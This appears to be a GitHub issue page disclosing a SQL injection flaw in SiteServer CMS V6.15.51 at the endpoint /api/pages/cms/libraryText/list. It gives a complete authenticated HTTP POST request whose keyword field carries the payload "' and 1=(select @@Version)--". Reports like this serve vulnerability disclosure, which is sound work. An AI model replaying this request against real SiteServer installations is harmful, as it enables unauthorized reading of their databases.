Skip to content

SQL 注入 #3237

New issue
New issue
Open
Open
SQL 注入#3237
@sobinge

Description

@sobinge
sobinge
opened on Oct 15, 2021

测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-v6.15.51/siteserver_install.zip
SiteServer: V6.15.51
测试环境:windows 2012 R2
数据库 sql server 2016
image
漏洞url:/api/pages/cms/libraryText/list
(需要登录测试)

包体
`POST /api/pages/cms/libraryText/list HTTP/1.1
Host: 192.168.39.3:8055
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 87
Origin: http://192.168.39.3:8055
Connection: close
Referer: http://192.168.39.3:8055/SiteServer/cms/libraryText.cshtml?siteId=1
Cookie: BAIRONG.VC.ADMINLOGIN=oeLExOp9UBM0equals0; ss_administrator_access_token=M3ENIa3NKJJ39JCRHnY4PgfJqMC7lFjggL0e9S06Bs9ubZE90add0xM2aesaL0add0Cxo8Xe5VZrSanerzFU8oZaMXCC9KMxdw29fLk6uNSSoY4Pa0add0BOZfzRwKT2t3LglumO4sTUKSz0slash0ubJ9QajCyTsKpmbPu7yv20add08zpsQyVPpl3TuMITkOCIX1EwcC7CeIJ50slash0XQ9d0slash0oR8ECV0add0690add0eXRHbEImnZsLBsrhv7KML0Jhuevbhvcjs0equals0; ASP.NET_SessionId=l3tothqgmzbgljaogh1uof3y; SS-ADMIN-TOKEN=z69iWbk6QAgWtUmPiJBXDd7vXmikE7IMRbVWfh0add00xyMUHXn13zDSbfJyodBLcAQuP9kU0slash0F7SybZwZUK7ER9csWj0ODr7NgSqXfVWABfJpKMXGuT2wQudsXkhDU9JMvsrkNIPV5cKDS0UUwsItxWt94dwYeCgnKabl82uiN53cZg92iNHdF5LlWO0add0JnX0add0Vqb0XIViYPb4l3CUTpPq0add0bKGxRk56DSZLeLh9qV0jIhotDI0equals00secret0; SS-LOGIN-CAPTCHA=pyXvigbttyM0equals00secret0
Cache-Control: max-age=0

{"siteId":1,"keyword":"' and 1=(select @@Version)--","groupId":0,"page":1,"perPage":24}`
image
image
image
image

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions